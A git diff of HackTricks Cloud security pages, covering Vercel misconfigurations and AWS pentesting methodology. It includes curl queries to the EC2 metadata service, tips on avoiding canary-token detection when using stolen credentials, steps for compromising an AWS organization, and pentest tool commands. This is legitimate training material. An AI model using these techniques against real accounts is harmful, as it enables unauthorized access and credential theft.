+ +**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. + +#### Security Configurations: + +**Directory Listing** + +- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. +- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. + +--- + +## Project Firewall + +### Firewall + +#### Security Configurations: + +**Enable Attack Challenge Mode** + +- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability +- **Risk:** Potential user experience problems. + +### Custom Rules & IP Blocking + +- **Misconfiguration:** Allows to unblock/block traffic +- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic + +--- + +## Project Deployment + +### Source + +- **Misconfiguration:** Allows access to read the complete source code of the application +- **Risk:** Potential exposure of sensitive information + +### Skew Protection + +- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. +- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future + +--- + +## Team Settings + +### General + +#### Security Configurations: + +- **Transfer** + - **Misconfiguration:** Allows to transfer all the projects to another team + - **Risk:** An attacker could steal the projects +- **Delete Project** + - **Misconfiguration:** Allows to delete the team with all the projects + - **Risk:** Delete the projects + +--- + +### Billing + +#### Security Configurations: + +- **Speed Insights Cost Limit** + - **Misconfiguration:** An attacker could increase this number + - **Risk:** Increased costs + +--- + +### Members + +#### Security Configurations: + +- **Add members** + - **Misconfiguration:** An attacker could maintain persitence inviting an account he control + - **Risk:** Attacker persistence +- **Roles** + - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) + - **Risk**: Increate the exposure of the Vercel Team + +--- + +### Access Groups + +An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. + +**Potential Misconfigurations:** + +- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. +- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. +- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. +- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. +- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. + +--- + +### Log Drains + +#### Security Configurations: + +- **Log Drains to third parties:** + - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs + - **Risk:** Partial persistence + +--- + +### Security & Privacy + +#### Security Configurations: + +- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. + - **Misconfiguration:** + - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. + - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. + - **Risks:** + - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. + - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. +- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. + - **Misconfiguration:** Not adding critical Git scopes to the protected list. +- **Risks:** + - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. + - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. +- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. + - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. + - **Risks:** + - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. + - **Data Breach:** Sensitive information like API keys and credentials could be leaked. +- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. + - **Misconfiguration:**\ + Granting access to audit logs to unauthorized team members. + - **Risks:** + - **Privacy Violations:** Exposure of sensitive user activities and data. + - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. +- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. + - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. + - **Risk:** Maintain persistence +- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. + - **Misconfiguration:** Leaving IP address visibility enabled without necessity. + - **Risks:** + - **Privacy Violations:** Non-compliance with data protection regulations like GDPR. + - **Legal Repercussions:** Potential fines and penalties for mishandling personal data. +- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. + - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. + - **Risks:** + - **Service Denial to Legitimate Users:** Blocking access for valid users or partners. + - **Operational Disruptions:** Loss of service availability for certain regions or clients. + +--- + +### Secure Compute + +**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. + +#### **Potential Misconfigurations and Risks** + +1. **Incorrect AWS Region Selection** + - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. + - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. +2. **Overlapping CIDR Blocks** + - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. + - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. +3. **Improper VPC Peering Configuration** + - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). + - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. +4. **Excessive Project Assignments** + - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. + - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. +5. **Inadequate IP Address Management** + - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. + - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. +6. **Including Build Containers Unnecessarily** + - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. + - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. +7. **Failure to Securely Handle Bypass Secrets** + - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. + - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. +8. **Ignoring Region Failover Configurations** + - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. + - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. +9. **Exceeding VPC Peering Connection Limits** + - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). + - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. +10. **Insecure Network Settings** + - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. + - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. + +--- + +### Environment Variables + +**Purpose:** Manage environment-specific variables and secrets used by all the projects. + +#### Security Configurations: + +- **Exposing Sensitive Variables** + - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. + - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. +- **Sensitive disabled** + - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. + - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. + +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md similarity index 64% rename from pentesting-cloud/aws-security/README.md rename to src/pentesting-cloud/aws-security/README.md index 1efc09d3b..8c53688de 100644 --- a/pentesting-cloud/aws-security/README.md +++ b/src/pentesting-cloud/aws-security/README.md @@ -1,19 +1,6 @@ # AWS Pentesting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -21,24 +8,24 @@ Learn & practice GCP Hacking: [!NOTE] +> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: ## Basic Enumeration @@ -80,7 +66,9 @@ After you have managed to obtain credentials, you need to know **to who do those If you found a SSRF in a machine inside AWS check this page for tricks: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ### Whoami @@ -102,16 +90,15 @@ TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metad curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document ``` -{% hint style="danger" %} -Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ -For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). -{% endhint %} +> [!CAUTION] +> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ +> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). ### Org Enumeration -{% content-ref url="aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](aws-services/aws-organizations-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-services/aws-organizations-enum.md +{{#endref}} ### IAM Enumeration @@ -120,38 +107,37 @@ If you have enough permissions **checking the privileges of each entity inside t If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ Check **how to do the numeration and brute-forcing** in: -{% content-ref url="aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-services/aws-iam-enum.md +{{#endref}} -{% hint style="info" %} -Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -In the following section you can check some ways to **enumerate some common services.** -{% endhint %} +> [!NOTE] +> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ +> In the following section you can check some ways to **enumerate some common services.** ## Services Enumeration, Post-Exploitation & Persistence AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: -{% content-ref url="aws-services/" %} -[aws-services](aws-services/) -{% endcontent-ref %} +{{#ref}} +aws-services/ +{{#endref}} Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: -{% content-ref url="aws-unauthenticated-enum-access/" %} -[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/) -{% endcontent-ref %} +{{#ref}} +aws-unauthenticated-enum-access/ +{{#endref}} ## Privilege Escalation If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: -{% content-ref url="aws-privilege-escalation/" %} -[aws-privilege-escalation](aws-privilege-escalation/) -{% endcontent-ref %} +{{#ref}} +aws-privilege-escalation/ +{{#endref}} ## Publicly Exposed Services @@ -160,7 +146,9 @@ As pentester/red teamer you should always check if you can find **sensitive info In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: -{% embed url="https://book.hacktricks.xyz/" %} +{{#ref}} +https://book.hacktricks.xyz/ +{{#endref}} ## Compromising the Organization @@ -168,20 +156,20 @@ In this book you should find **information** about how to find **exposed AWS ser When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. -
+
So, in order to access as administrator a child account you need: -* **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. - * To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` - * You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. -* **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). +- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. + - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` + - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. +- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). ## Automated Tools ### Recon -* [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. +- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. ```bash # Install @@ -194,8 +182,8 @@ AWS_PROFILE= aws_recon \ --verbose ``` -* [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -* [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. +- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. ```bash # Installation steps in github @@ -223,7 +211,7 @@ python3 cloudmapper.py stats --accounts dev ## In the report you will find all the info already python3 cloudmapper.py report --accounts dev -# Identify potential issues +# Identify potential issues python3 cloudmapper.py audit --accounts dev --json > audit.json python3 cloudmapper.py audit --accounts dev --markdow > audit.md python3 cloudmapper.py iam_report --accounts dev @@ -242,7 +230,7 @@ python cloudmapper.py prepare #Prepare webserver python cloudmapper.py webserver #Show webserver ``` -* [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. +- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. ```bash # Install @@ -253,15 +241,15 @@ pip install cartography AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j ``` -* [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. -* [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. -* [**aws\_public\_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. +- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. +- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. +- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. ### Privesc & Exploiting -* [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). -* [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc\_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. - * Note that pacu **only checks your own privescs paths** (not account wide). +- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). +- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. + - Note that pacu **only checks your own privescs paths** (not account wide). ```bash # Install @@ -277,7 +265,7 @@ pacu > exec iam__privesc_scan # List privileged permissions ``` -* [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) +- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) ```bash # Install @@ -301,7 +289,7 @@ pmapper --profile dev orgs create pmapper --profile dev orgs display ``` -* [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ +- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use). ```bash @@ -316,13 +304,13 @@ cloudsplaining download --profile dev cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/ ``` -* [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. -* [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image -* [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. +- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. +- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image +- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. ### Audit -* [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). +- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). ```bash ./index.js --csv=file.csv --console=table --config ./config.js @@ -331,7 +319,7 @@ cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output / ## use "cis" for cis level 1 and 2 ``` -* [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. +- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. ```bash # Install python3, jq and git @@ -344,13 +332,13 @@ prowler prowler aws --profile custom-profile [-M csv json json-asff html] ``` -* [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. +- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. ```bash cloudfox aws --profile [profile-name] all-checks ``` -* [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. +- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. ```bash # Install @@ -363,14 +351,14 @@ scout --help scout aws -p dev ``` -* [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) -* [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. +- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) +- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. ### Constant Audit -* [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. -* [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. -* [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. +- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. +- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. +- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. ## DEBUG: Capture AWS cli requests @@ -395,20 +383,7 @@ aws ... ## References -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) -* [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) +- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md similarity index 78% rename from pentesting-cloud/aws-security/aws-basic-information/README.md rename to src/pentesting-cloud/aws-security/aws-basic-information/README.md index a02cb59a1..c86c8f3bb 100644 --- a/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -1,23 +1,10 @@ # AWS - Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Organization Hierarchy -![](<../../../.gitbook/assets/image (151).png>) +![](<../../../images/image (151).png>) ### Accounts @@ -27,19 +14,20 @@ This is very interesting from a **security** point of view, as **one account won Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. -* The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: +- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: - * Create accounts in the organization - * Invite other existing accounts to the organization - * Remove accounts from the organization - * Manage invitations - * Apply policies to entities (roots, OUs, or accounts) within the organization - * Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. - * It's possible to login as the root user using the email and password used to create this root account/organization. + - Create accounts in the organization + - Invite other existing accounts to the organization + - Remove accounts from the organization + - Manage invitations + - Apply policies to entities (roots, OUs, or accounts) within the organization + - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. + - It's possible to login as the root user using the email and password used to create this root account/organization. - The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. -* **Member 